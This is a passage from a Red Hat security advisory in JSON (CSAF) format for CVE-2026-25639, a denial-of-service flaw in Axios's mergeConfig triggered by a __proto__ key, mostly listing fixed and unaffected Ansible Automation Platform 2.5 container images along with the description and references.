"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
